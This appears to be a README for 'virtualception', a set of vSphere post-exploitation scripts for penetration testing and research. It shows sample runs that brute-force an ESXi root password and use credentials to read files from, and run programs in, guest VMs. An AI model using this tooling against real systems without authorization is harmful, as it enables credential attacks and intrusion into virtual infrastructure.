What is virtualception
– blog about research of virtual security
– some scripts for post-exploitation of virtual environments (vSphere only currently)
– More information
– Most scripts include the -h switch, so here only small examples:
– python scripts tested with pyvmomi 5.5
– powershell scripts tested with PowerCLI

Short description of the scripts
$ python -s -u root -P pass.txt
failed  – user root password: 1234567
* SUCCESS – user root password: password
$ python -v “527a8ff0-09db-b5cc-eec4-297e49b45ee7” -r dax -w password -u root -p password -s -l “c:\\test.txt”
Successfully downloaded file
Output: test
$ python -v “527a8ff0-09db-b5cc-eec4-297e49b45ee7” -r dax -w password -u root -p password -s -l “ipconfig.exe” -f “”
# python -v “527a8ff0-09db-b5cc-eec4-297e49b45ee7” -r dax -w password -u root -p password -s -l “c:\\test2.txt” -f test.txt

Two one liners for starting and stopping the ssh service on an ESXi server. Don’t forget to authenticate.

Getting started
For installing SDKs and tools for starting penetration testing or own research start reading here:

15.05.2016 Version 0.1: ssh_start_service.ps1, ssh_stop_service.ps1,,,,